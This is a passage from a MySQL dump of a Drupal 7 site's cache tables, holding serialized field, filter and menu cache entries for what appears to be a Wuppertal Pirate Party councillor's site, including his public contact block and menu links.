types\";a:1:{i:0;s:17:\"text_with_summary\";}s:8:\"settings\";a:2:{s:4:\"rows\";i:20;s:12:\"summary_rows\";i:5;}s:6:\"module\";s:4:\"text\";}s:13:\"options_onoff\";a:5:{s:5:\"label\";s:22:\"Single on/off checkbox\";s:11:\"field types\";a:1:{i:0;s:12:\"list_boolean\";}s:9:\"behaviors\";a:1:{s:15:\"multiple values\";i:4;}s:8:\"settings\";a:1:{s:13:\"display_label\";i:0;}s:6:\"module\";s:7:\"options\";}s:15:\"options_buttons\";a:5:{s:5:\"label\";s:25:\"Check boxes/radio buttons\";s:11:\"field types\";a:5:{i:0;s:12:\"list_integer\";i:1;s:10:\"list_float\";i:2;s:9:\"list_text\";i:3;s:12:\"list_boolean\";i:4;s:23:\"taxonomy_term_reference\";}s:9:\"behaviors\";a:1:{s:15:\"multiple values\";i:4;}s:8:\"settings\";a:0:{}s:6:\"module\";s:7:\"options\";}s:11:\"image_image\";a:5:{s:5:\"label\";s:5:\"Image\";s:11:\"field types\";a:1:{i:0;s:5:\"image\";}s:8:\"settings\";a:2:{s:18:\"progress_indicator\";s:8:\"throbber\";s:19:\"preview_image_style\";s:9:\"thumbnail\";}s:9:\"behaviors\";a:2:{s:15:\"multiple values\";i:4;s:13:\"default value\";i:1;}s:6:\"module\";s:5:\"image\";}s:6:\"number\";a:4:{s:5:\"label\";s:10:\"Text field\";s:11:\"field types\";a:3:{i:0;s:14:\"number_integer\";i:1;s:14:\"number_decimal\";i:2;s:12:\"number_float\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:6:\"number\";}s:14:\"options_select\";a:5:{s:5:\"label\";s:11:\"Select list\";s:11:\"field types\";a:4:{i:0;s:12:\"list_integer\";i:1;s:10:\"list_float\";i:2;s:9:\"list_text\";i:3;s:23:\"taxonomy_term_reference\";}s:9:\"behaviors\";a:1:{s:15:\"multiple values\";i:4;}s:8:\"settings\";a:0:{}s:6:\"module\";s:7:\"options\";}s:12:\"file_generic\";a:5:{s:5:\"label\";s:4:\"File\";s:11:\"field types\";a:1:{i:0;s:4:\"file\";}s:8:\"settings\";a:1:{s:18:\"progress_indicator\";s:8:\"throbber\";}s:9:\"behaviors\";a:2:{s:15:\"multiple values\";i:4;s:13:\"default value\";i:1;}s:6:\"module\";s:4:\"file\";}}s:15:\"formatter types\";a:16:{s:12:\"file_default\";a:4:{s:5:\"label\";s:12:\"Generic file\";s:11:\"field types\";a:1:{i:0;s:4:\"file\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"file\";}s:10:\"file_table\";a:4:{s:5:\"label\";s:14:\"Table of files\";s:11:\"field types\";a:1:{i:0;s:4:\"file\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"file\";}s:14:\"file_url_plain\";a:4:{s:5:\"label\";s:11:\"URL to file\";s:11:\"field types\";a:1:{i:0;s:4:\"file\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"file\";}s:5:\"image\";a:4:{s:5:\"label\";s:5:\"Image\";s:11:\"field types\";a:1:{i:0;s:5:\"image\";}s:8:\"settings\";a:2:{s:11:\"image_style\";s:0:\"\";s:10:\"image_link\";s:0:\"\";}s:6:\"module\";s:5:\"image\";}s:12:\"list_default\";a:4:{s:5:\"label\";s:7:\"Default\";s:11:\"field types\";a:4:{i:0;s:12:\"list_integer\";i:1;s:10:\"list_float\";i:2;s:9:\"list_text\";i:3;s:12:\"list_boolean\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"list\";}s:8:\"list_key\";a:4:{s:5:\"label\";s:3:\"Key\";s:11:\"field types\";a:4:{i:0;s:12:\"list_integer\";i:1;s:10:\"list_float\";i:2;s:9:\"list_text\";i:3;s:12:\"list_boolean\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"list\";}s:14:\"number_integer\";a:4:{s:5:\"label\";s:7:\"Default\";s:11:\"field types\";a:1:{i:0;s:14:\"number_integer\";}s:8:\"settings\";a:4:{s:18:\"thousand_separator\";s:0:\"\";s:17:\"decimal_separator\";s:1:\".\";s:5:\"scale\";i:0;s:13:\"prefix_suffix\";b:1;}s:6:\"module\";s:6:\"number\";}s:14:\"number_decimal\";a:4:{s:5:\"label\";s:7:\"Default\";s:11:\"field types\";a:2:{i:0;s:14:\"number_decimal\";i:1;s:12:\"number_float\";}s:8:\"settings\";a:4:{s:18:\"thousand_separator\";s:0:\"\";s:17:\"decimal_separator\";s:1:\".\";s:5:\"scale\";i:2;s:13:\"prefix_suffix\";b:1;}s:6:\"module\";s:6:\"number\";}s:18:\"number_unformatted\";a:4:{s:5:\"label\";s:11:\"Unformatted\";s:11:\"field types\";a:3:{i:0;s:14:\"number_integer\";i:1;s:14:\"number_decimal\";i:2;s:12:\"number_float\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:6:\"number\";}s:28:\"taxonomy_term_reference_link\";a:4:{s:5:\"label\";s:4:\"Link\";s:11:\"field types\";a:1:{i:0;s:23:\"taxonomy_term_reference\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:29:\"taxonomy_term_reference_plain\";a:4:{s:5:\"label\";s:10:\"Plain text\";s:11:\"field types\";a:1:{i:0;s:23:\"taxonomy_term_reference\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:36:\"taxonomy_term_reference_rss_category\";a:4:{s:5:\"label\";s:12:\"RSS category\";s:11:\"field types\";a:1:{i:0;s:23:\"taxonomy_term_reference\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:8:\"taxonomy\";}s:12:\"text_default\";a:4:{s:5:\"label\";s:7:\"Default\";s:11:\"field types\";a:3:{i:0;s:4:\"text\";i:1;s:9:\"text_long\";i:2;s:17:\"text_with_summary\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}s:10:\"text_plain\";a:4:{s:5:\"label\";s:10:\"Plain text\";s:11:\"field types\";a:3:{i:0;s:4:\"text\";i:1;s:9:\"text_long\";i:2;s:17:\"text_with_summary\";}s:8:\"settings\";a:0:{}s:6:\"module\";s:4:\"text\";}s:12:\"text_trimmed\";a:4:{s:5:\"label\";s:7:\"Trimmed\";s:11:\"field types\";a:3:{i:0;s:4:\"text\";i:1;s:9:\"text_long\";i:2;s:17:\"text_with_summary\";}s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";}s:23:\"text_summary_or_trimmed\";a:4:{s:5:\"label\";s:18:\"Summary or trimmed\";s:11:\"field types\";a:1:{i:0;s:17:\"text_with_summary\";}s:8:\"settings\";a:1:{s:11:\"trim_length\";i:600;}s:6:\"module\";s:4:\"text\";}}s:13:\"storage types\";a:1:{s:17:\"field_sql_storage\";a:4:{s:5:\"label\";s:19:\"Default SQL storage\";s:11:\"description\";s:64:\"Stores fields in the local SQL database, using per-field tables.\";s:8:\"settings\";a:0:{}s:6:\"module\";s:17:\"field_sql_storage\";}}}',0,1444940208,1); /*!40000 ALTER TABLE `cache_field` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_filter` -- DROP TABLE IF EXISTS `cache_filter`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache_filter` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the Filter module to store already...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_filter` -- LOCK TABLES `cache_filter` WRITE; /*!40000 ALTER TABLE `cache_filter` DISABLE KEYS */; INSERT INTO `cache_filter` VALUES ('filtered_html::527ec5803ace20515349a832f12271c663418d7722c57eeff04b1b9d56216491','

                    Stadtverordneter
                    \nOliver Graf
                    \nJohannes Rau Platz 1
                    \n42275 Wuppertal
                    \n01523/7419093
                    \nTwitter: @OlliTal
                    \neMail: ollirat@ollital.de

                    \n',0,1447855439,0),('filtered_html::8ef39fb42f49a40e29dffd81c657d1b0e6fd1d8968e3b5f53992a027c4e7ff16','

                    Stadtverordneter
                    \nOliver Graf
                    \nJohannes Rau Platz 1
                    \n42275 Wuppertal
                    \nTwitter: @OlliTal
                    \neMail: ollirat@ollital.de

                    \n',0,1444940208,0),('filtered_html::dec8eb7ddfb01e545598293937234bea81cfb267e2a9a16a7f1d56ea28f03b86','

                    Wuppertal Kommunal Piraten

                    \n',0,1444940208,0),('filtered_html::f164065e594b87be58a850a27acba96a70eb7e97626403a32524d4a020a15c72','

                    Stadtverordneter
                    \nOliver Graf
                    \nJohannes Rau Platz 1
                    \n42275 Wuppertal
                    \n01523/4719093
                    \nTwitter: @OlliTal
                    \neMail: ollirat@ollital.de

                    \n',0,1447857834,0),('plain_text::e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855','',0,1444995825,0); /*!40000 ALTER TABLE `cache_filter` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_form` -- DROP TABLE IF EXISTS `cache_form`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache_form` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the form system to store recently built...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_form` -- LOCK TABLES `cache_form` WRITE; /*!40000 ALTER TABLE `cache_form` DISABLE KEYS */; /*!40000 ALTER TABLE `cache_form` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_image` -- DROP TABLE IF EXISTS `cache_image`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache_image` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table used to store information about image...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_image` -- LOCK TABLES `cache_image` WRITE; /*!40000 ALTER TABLE `cache_image` DISABLE KEYS */; /*!40000 ALTER TABLE `cache_image` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_menu` -- DROP TABLE IF EXISTS `cache_menu`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache_menu` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the menu system to store router...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_menu` -- LOCK TABLES `cache_menu` WRITE; /*!40000 ALTER TABLE `cache_menu` DISABLE KEYS */; INSERT INTO `cache_menu` VALUES ('links:main-menu:all:0:en:0','a:2:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;}',0,1445260022,1),('links:main-menu:page:admin/dashboard:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445691048,1),('links:main-menu:page:admin/reports/dblog:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940177,1),('links:main-menu:page:admin/reports/status:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940260,1),('links:main-menu:page:admin/reports/updates/update:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445543754,1),('links:main-menu:page:admin/reports:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940256,1),('links:main-menu:page:admin/structure/block/manage/block/1/configure:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1447855413,1),('links:main-menu:page:node/3:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445013096,1),('links:main-menu:page:node/4/edit:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:2:{i:0;i:0;i:350;s:3:\"350\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:350;s:3:\"350\";}}',0,1445260022,1),('links:main-menu:page:node/4/edit:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:2:{i:0;i:0;i:350;s:3:\"350\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:350;s:3:\"350\";}}',0,1445260022,1),('links:main-menu:page:node/4:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:2:{i:0;i:0;i:350;s:3:\"350\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:350;s:3:\"350\";}}',0,1444940212,1),('links:main-menu:page:node/4:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:2:{i:0;i:0;i:350;s:3:\"350\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:350;s:3:\"350\";}}',0,1444940212,1),('links:main-menu:page:node/5:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:2:{i:0;i:0;i:351;s:3:\"351\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:351;s:3:\"351\";}}',0,1444940217,1),('links:main-menu:page:node/5:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:2:{i:0;i:0;i:351;s:3:\"351\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:351;s:3:\"351\";}}',0,1444940217,1),('links:main-menu:page:node/6:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:2:{i:0;i:0;i:390;s:3:\"390\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:390;s:3:\"390\";}}',0,1444940220,1),('links:main-menu:page:node/6:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:2:{i:0;i:0;i:390;s:3:\"390\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:390;s:3:\"390\";}}',0,1444940220,1),('links:main-menu:page:node/7:en:1:0:trail','a:5:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";N;s:17:\"only_active_trail\";b:1;s:8:\"expanded\";a:2:{i:0;i:0;i:391;s:3:\"391\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:391;s:3:\"391\";}}',0,1444940233,1),('links:main-menu:page:node/7:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:2:{i:0;i:0;i:391;s:3:\"391\";}s:12:\"active_trail\";a:2:{i:0;i:0;i:391;s:3:\"391\";}}',0,1444940233,1),('links:main-menu:page:node/add:en:0:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445104350,1),('links:main-menu:page:node:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444940208,1),('links:main-menu:page:taxonomy/term/1:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445085523,1),('links:main-menu:page:taxonomy/term/2:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445085534,1),('links:main-menu:page:taxonomy/term/3:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444995772,1),('links:main-menu:page:user/1:en:0:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445257195,1),('links:main-menu:page:user/login:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445003119,1),('links:main-menu:page:user/password:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1444973651,1),('links:main-menu:page:user/register:en:0:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445010704,1),('links:main-menu:page:user:en:1:1','a:4:{s:9:\"min_depth\";i:1;s:9:\"max_depth\";i:1;s:8:\"expanded\";a:1:{i:0;i:0;}s:12:\"active_trail\";a:1:{i:0;i:0;}}',0,1445023482,1),('links:main-menu:tree-data:en:244b65899deca600f312aa069cb96c0ec422a6c207062fc024a38448cdaa09f5','a:2:{s:4:\"tree\";a:6:{i:347;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"347\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:32:\"https://www.ollital.de/wordpress\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:49:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"347\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:348;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"348\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:46:\"http://wiki.piratenpartei.de/Benutzer:Darkwing\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:5:\"Pirat\";s:7:\"options\";s:49:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:0:\"\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"348\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:350;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"350\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/4\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:7:\"Termine\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"3\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"350\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:351;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"351\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/5\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:16:\"Mitgliedschaften\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"4\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"351\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:390;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"390\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/6\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:8:\"Anträge\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:3:\"390\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;s:6:\"access\";b:0;}s:5:\"below\";a:0:{}}i:391;a:2:{s:4:\"link\";a:43:{s:9:\"menu_name\";s:9:\"main-menu\";s:4:\"mlid\";s:3:\"391\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:6:\"node/7\";s:11:\"router_path\";s:6:\"node/%\";s:10:\"link_title\";s:8:\"Freifunk\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12: